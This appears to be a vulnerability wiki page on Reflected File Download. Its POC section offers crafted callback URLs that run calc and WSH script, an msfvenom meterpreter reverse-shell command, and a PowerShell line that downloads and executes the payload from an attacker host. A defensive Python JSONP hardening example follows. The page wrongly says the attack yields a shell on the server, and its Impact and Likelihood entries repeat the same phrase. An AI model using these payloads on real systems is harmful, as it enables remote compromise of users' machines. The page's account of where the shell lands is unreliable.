Cobalt Vulnerability Wiki

V5 - Validation/Sanitization

Reflected File Download (RFD)

POC


Here are some of the commands you can try to exploit this vulnerability:

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc||

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "Calc.exe";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);

Create a meterpreter payload:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World');var command = "powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://attackerip:8080/meterpreter-payload.txt')";var WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run(command);

You'll get a shell on the server.

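On the defensive side, the two ingredients of this bug are a response body that reflects the callback parameter unchecked and a download filename that the URL path controls (the ;/setup.bat matrix-parameter trick above). The following is an added example, not Cobalt's or any product's code, of a JSONP response builder hardened against RFD: it allow-lists the callback name, JSON-escapes reflected data, and pins the filename and MIME handling with Content-Disposition and X-Content-Type-Options. The function names, the regex and the fixed filename are assumptions chosen for the example.

```python
import json
import re

# Allow-list for JSONP callback names: a JavaScript identifier with optional dotted
# members (e.g. "jQuery123.done"). Quotes, "||", ";", "(" and backslashes never pass,
# so the reflected name can never carry cmd.exe or WSH syntax.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Fixed, server-chosen download name (assumed). The URL path no longer decides whether
# the browser saves the response as setup.bat.
DOWNLOAD_NAME = "api-response.json"


def validate_callback(callback):
    """Return the callback if it is a safe identifier of sane length, else None."""
    if callback is None or len(callback) > 64:
        return None
    return callback if CALLBACK_RE.fullmatch(callback) else None


def build_jsonp_response(callback, payload):
    """Build (status, headers, body) for a JSONP endpoint hardened against RFD."""
    name = validate_callback(callback)
    if name is None:
        # Reject instead of "cleaning": a partially sanitised name is still reflected input.
        return 400, {"Content-Type": "application/json"}, json.dumps({"error": "invalid callback"})
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        # Attachment with a fixed .json name: even if a user is tricked into saving the
        # response, it is not saved with an executable extension taken from the URL.
        "Content-Disposition": 'attachment; filename="%s"' % DOWNLOAD_NAME,
        # Stops MIME sniffing of the body into a script or other executable type.
        "X-Content-Type-Options": "nosniff",
    }
    # json.dumps escapes quotes in reflected data. Note that cmd.exe does not honour
    # backslash escapes (the rfd\"||calc|| payload relies on exactly that), so escaping
    # alone is not enough; the fixed filename and nosniff header carry the defence.
    body = "%s(%s);" % (name, json.dumps(payload))
    return 200, headers, body
```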
Impact

Very High (when a shell session is obtained)



Likelihood

Very High (when a shell session is obtained)
